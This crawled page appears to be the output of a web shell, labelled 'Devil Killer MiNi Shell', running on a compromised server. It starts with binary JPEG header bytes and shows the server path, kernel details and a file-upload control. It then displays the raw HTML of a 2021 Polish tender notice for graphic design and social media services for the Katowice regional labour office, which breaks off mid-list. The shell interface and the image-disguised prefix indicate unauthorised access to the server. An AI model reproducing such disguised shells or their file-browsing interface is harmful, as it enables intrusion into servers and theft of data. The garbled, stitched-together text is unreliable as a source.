JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210615/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210615/0008331701-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00083317 z dnia 2021-06-15</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa projektowania graficznego oraz wsparcia działań w mediach społecznościowych Wojewódzkiego Urzędu Pracy w Katowicach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">WOJEWÓDZKI URZĄD PRACY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276855696</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Tadeusza Kościuszki 30</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-048</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">wup@wup-katowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://wupkatowice.praca.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Jednostka organizacyjna samorządu województw nieposiadająca osobowości prawnej </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa projektowania graficznego oraz wsparcia działań w mediach społecznościowych Wojewódzkiego Urzędu Pracy w Katowicach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7edf29dc-cdae-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00083317</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000417/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Usługi w zakresie promocji </p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Program Operacyjny Wiedza Edukacja Rozwój 2014-2020 i Regionalny Program Operacyjny Województwa Śląskiego na lata 2014-2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/470092 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformy: platformazakupowa.pl pod<br/>adresem: https://platformazakupowa.pl/transakcja/470092 2. Wymaga się, aby komunikacja z Wykonawcami odbywała się tylko poprzez platformę zakupową za pośrednictwem formularza “Wyślij<br/>wiadomość do Zamawiającego”, nie za pośrednictwem adresu email.Uwaga: korespondencja przesłana w inny sposób niż poprzez platformę nie będzie brana pod uwagę, zostanie uznana jako złożona nieskutecznie. Zamawiający nie będzie informował o błędnym złożeniu korespondencji.Adresstrony internetowej: https://platformazakupowa.pl/transakcja/470092</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Komunikacja między Zamawiającym a Wykonawcami w zakresie:- przesyłania Zamawiającemu<br/>pytań do treści SWZ;- przesyłania odpowiedzi na wszelkie wezwania Zamawiającego wynikające<br/>zustawy - Prawo zamówień publicznych;- przesyłania wniosków, informacji, oświadczeń Wykonawcy;<br/>przesyłania odwołania lub innych dokumentów - odbywa się za<br/>pośrednictwemhttps://platformazakupowa.pl/transakcja/470092 i formularza „Wyślij wiadomość do<br/>Zamawiającego”. 2.Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji<br/>przyjmuje się datę ich przesłania za pośrednictwem https://platformazakupowa.pl/transakcja/470092<br/>poprzez kliknięcieprzycisku „Wyślij wiadomość do Zamawiającego” po którym pojawi się komunikat, że<br/>wiadomość została wysłana do Zamawiającego.3. Zamawiający będzie przekazywał Wykonawcom<br/>informacje wformie elektronicznej za pośrednictwem https://platformazakupowa.pl/transakcja/470092<br/>Informacjedotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia<br/>ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja,<br/>którejadresatem, zgodnie z obowiązującymi przepisami, jest konkretny Wykonawca, będzie<br/>przekazywana w formie elektronicznej za pośrednictwem<br/>https://platformazakupowa.pl/transakcja/470092 dokonkretnego Wykonawcy.4. Wykonawca jako<br/>podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na<br/>https://platformazakupowa.pl/transakcja/470092 przesłanych przez Zamawiającego, gdyż system<br/>powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.5. Zamawiający,<br/>określa niezbędne wymagania sprzętowo - aplikacyjneumożliwiające pracę na platformazakupowa.pl,<br/>tj.:a. stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,b.<br/>komputer klasy PC lub MAC o następującej konfiguracji:pamięć min. 2 GB Ram, procesor Intel IV 2<br/>GHz lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux,<br/>lub ich nowsze wersje,c. zainstalowana dowolnaprzeglądarka internetowa w najnowszej dostępnej<br/>wersji (zalecane przeglądarki: Internet Explorer, Chrome i Mozilla Firefox)d. włączona obsługa<br/>JavaScript,e. zainstalowany program Adobe AcrobatReader lub inny obsługujący format plików .pdf,f.<br/>Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.g. Oznaczenie czasu<br/>odbioru danych przez platformę zakupową stanowidatę oraz dokładny czas (hh:mm:ss) generowany<br/>wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.6. Wykonawca,<br/>przystępując do niniejszego postępowania oudzielenie zamówienia publicznego:a. akceptuje warunki<br/>korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej<br/>pod linkiem w zakładce „Regulamin"oraz uznaje go za wiążący,b. zapoznał i stosuje się do Instrukcji<br/>składania ofert/wniosków dostępnej pod linkiem. 7. Zamawiający nie ponosi odpowiedzialności za<br/>złożenie oferty w sposób niezgodny zInstrukcją korzystania z platformazakupowa.pl, w szczególności<br/>za sytuację, gdy Zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert (np.<br/>złożenie oferty w zakładce„Wyślij wiadomość do Zamawiającego”). Oferta wraz z załącznikami oraz<br/>wszelkie inne dokumenty przekazywane w późniejszym czasie Zamawiającemu muszą zostać<br/>podpisane elektronicznymkwalifikowanym podpisem lub podpisem zaufanym lub podpisem<br/>osobistym.Wszelkie pozostałe szczegółowe informacje zostały zawarte w SWZ do niniejszego<br/>postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia<br/>ParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L<br/>119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: 1. Administratorem Pani/Pana danych<br/>osobowych jestWojewódzki Urząd Pracy adres: ul. Kościuszki 30, 40-048 Katowice, tel: 32 757 33 60<br/>fax: 32 757 33 62;2. Inspektorem ochrony danych osobowych w Wojewódzkim Urzędzie Pracy w<br/>Katowicach jest PaniJustyna Nowak, kontakt: iod@wup-katowice.pl, telefon: (32) 757 33 06;3.<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>z postępowaniem oudzielenie zamówienia publicznego TP/9/21 pn: „Usługa projektowania graficznego<br/>oraz wsparcia działań w mediach społecznościowych Wojewódzkiego Urzędu Pracy w Katowicach ”.4.<br/>Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona<br/>zostaniedokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp;5. Pani/Pana dane<br/>osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia<br/>zakończeniapostępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata,<br/>okres przechowywania obejmuje cały czas trwania umowy;6. Obowiązek podania przez Panią/Pana<br/>danychosobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w<br/>przepisach ustawy, związanym z udziałem w postępowaniu o udzielenie<br/>zamówieniapublicznego;konsekwencje niepodania określonych danych wynikają z ustawy;7. W<br/>odniesieniu do<br/>Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany,<br/>stosowanie do art. 22RODO;8. Posiada Pani/Pan:- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;- na podstawie art. 16 RODO prawo do sprostowania<br/>Pani/Pana danychosobowych;- na podstawie art. 18 RODO prawo żądania od administratora<br/>ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18<br/>ust. 2 RODO;- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna<br/>Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;9. W<br/>przypadkugdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO, wymagałoby<br/>niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania<br/>dodatkowychinformacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub<br/>daty postępowania o udzielenie zamówienia publicznego lub konkursu;10. Wystąpienie z żądaniem,<br/>októrym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu;11.Nie przysługuje<br/>Pani/Panu:- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;-<br/>prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;12. Na podstawie art. 21<br/>RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną<br/>przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. Jednocześnie Zamawiający<br/>przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14<br/>RODOwzględem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z<br/>prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od Wykonawcy biorącegoudział<br/>w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa wart. 14<br/>ust. 5 RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">TP/9/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 499251,93 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 24857,30 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa projektowania graficznego oraz wsparcia działań w<br/>mediach społecznościowych Wojewódzkiego Urzędu Pracy w Katowicach.Usługa obejmuje:•<br/>Opracowanie projektów graficznych reklam na potrzeby kanału social media prowadzonego<br/>przez Zamawiającego (w tym zapewnienie zdjęć, projekty grafik, infografik); • Wsparcie doradcze<br/>on-line dla Zamawiającego w zakresie prowadzenia efektywnych działań reklamowych na kanale<br/>social media prowadzonym przez Zamawiającego,• Zakup subskrypcji do internetowego<br/>narzędzia umożliwiającego tworzenie projektów graficznych on-line wraz z dostępem do banku<br/>zdjęć, z którego Zamawiający będzie mógł korzystać na potrzeby własne prowadzenia działań<br/>reklamowych w mediach społecznościowych, na stronach internetowych – w czasie<br/>realizacjiusługi; • Zapewnienie możliwości płatnych działań reklamowych na kanale social media<br/>prowadzonym przez Zamawiającego, tj. utworzenie Menadżera firmy na Facebooku (którego<br/>Wykonawca będzie administratorem) oraz aktywowanie konta reklamowego, które będzie co miesiąc zasilone kwotą w wysokości 1500,00 zł brutto, przeznaczoną na reklamy promujące<br/>RPO WSL oraz PO WER. Zamawiający we własnym zakresie dokona publikacji reklam oraz<br/>odpowiednich ustawień (budżet reklamy, czas trwania, cel, grupa docelowa, itd.).Szczegółowy<br/>opis przedmiotu zamówienia został zawartyw SWZ do niniejszego postępowania. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79341400-0 - Usługi prowadzenia kampanii reklamowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79822500-7 - Usługi projektów graficznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Przyznawanie ilości punktów poszczególnym ofertom odbywać się<br/>będzie wg następującej zasady:1) Kryterium: cena – waga 60 pkt Ocena punktowa wskazanego<br/>kryterium dokonana zostanie zgodnie z formułą:Najniższa cena brutto spośród wszystkich ofert /<br/>Cenabrutto badanej oferty x 60 pkt. 2)Kryterium: Ocena próbki w postaci przykładowego projektu<br/>graficznego reklamy/posta w mediach społecznościowych: waga – 30 pktPunkty za kryterium zostaną<br/>przyznane na podstawie badania załączonego do oferty: przykładowego projektu graficznego<br/>reklamy/posta na potrzeby Facebook’a.Próbka oceniona zostanie w skali punktowej od 0 do 30<br/>punktów.Zamawiający będzie przyznawał punkty w następujący sposób:1. Poprawność merytoryczna i<br/>językowa treści hasła reklamy (poprawność stylistyczna, interpunkcyjna, ortograficzna, gramatyczna) o<br/>długości max. 5 słów – 0-3 pkt:1) Treść hasła zawiera błędy w zakresie poprawności językowej/Treść<br/>hasła bezbłędna – 0/1pkt;2) Treść hasła zawiera błędy w zakresie poprawności merytorycznej/ Treść<br/>hasła bezbłędna - 0/1 pkt;3) Treść hasła nie mieści się w limicie max. 5 słów/ Treść hasła mieści się w<br/>limicie max. 5 słów – 0/1pkt.2.Poprawność projektu graficznego reklamy (zgodność z Linią graficzną<br/>RPO WSL i zastosowanie obowiązkowych elementów, tj. logotypów FE oraz zdjęcia) - 0-3 pkt:1) Nie<br/>zastosowano zdjęcia lub zastosowano zdjęcie nieadekwatne do tematu reklamy/ Zastosowano zdjęcie<br/>adekwatne do tematu reklamy - 0/1 pkt;2) Oprawa graficzna zdjęcia zastosowana niezgodnie z Linią<br/>graficzną RPO WSL/Oprawa graficzna zdjęcia zastosowana zgodnie z Linią graficzną RPO WSL – 0/1<br/>pkt; 3) Zastosowano niepoprawnie obowiązkowe logotypy FE/Zastosowano poprawnie obowiązkowe<br/>logotypy FE – 0/1 pkt.Liczba punktów, którą uzyska oferta Wykonawcy będzie obliczana zgodnie z<br/>wzorem:Liczba punktów przyznana za ocenę próbki w postaci przykładowego projektu graficznego<br/>reklamy/posta w mediach społecznościowych, dołączonego do badanej oferty/Najwyższa liczba<br/>punktów przyznana za ocenę próbki w postaci przykładowego projektu graficznego reklamy/posta w<br/>mediach społecznościowych spośród ważnych ofertx30.Ocena próbki zostanie dokonana przez<br/>komisję złożoną z 5 osób, pracowników Wojewódzkiego Urzędu Pracy w Katowicach posiadających<br/>odpowiednią wiedzę merytoryczną. Liczba punktów za ocenę próbki, dołączonej do danej oferty,<br/>zostanie przyznana jako wspólna ocena, wydana przez wszystkich członków komisji.3) Kryterium<br/>społeczne (zatrudnienie do realizacji zamówienia osoby z niepełnosprawnościami): waga – 10 pkt1.<br/>Zamawiający przyzna ofercie 10 punktów, jeżeli Wykonawca zadeklaruje zatrudnienie do realizacji<br/>zamówienia minimum 1 osoby z niepełnosprawnościami. Ocena ofert zostanie dokonana na podstawie<br/>deklaracji w formularzu oferty. Deklaracja zobowiązuje Wykonawcę do zatrudniania* przez cały okres<br/>realizacji umowy, tj. do dnia odbioru całości przedmiotu umowy potwierdzonego raportem końcowym,<br/>minimum jednej osoby z niepełnosprawnościami – zgodnie z definicją osoby z niepełnosprawnościami<br/>określonej w ustawie z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnieniu<br/>osób niepełnosprawnych (t.j. Dz. U. z 2019 r. poz. 1172 z późn. zm.).Ocena ofert w kryterium zostanie<br/>dokonana zgodnie z zasadą: • jeśli Wykonawca zrealizuje usługę i zatrudni do realizacji osobę z<br/>niepełnosprawnościami (na podstawie deklaracji w formularzu ofertowym) – otrzyma 10 pkt.• jeśli Wykonawca zrealizuje usługę bez zatrudnienia do realizacji osoby z niepełnosprawnościami (na<br/>podstawie deklaracji w formularzu ofertowym) – otrzyma 0 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ocena próbki w postaci przykładowego projektu graficznego reklamy/posta w mediach społecznościowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">zatrudnienie do realizacji zamówienia osoby z niepełnosprawnościami</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 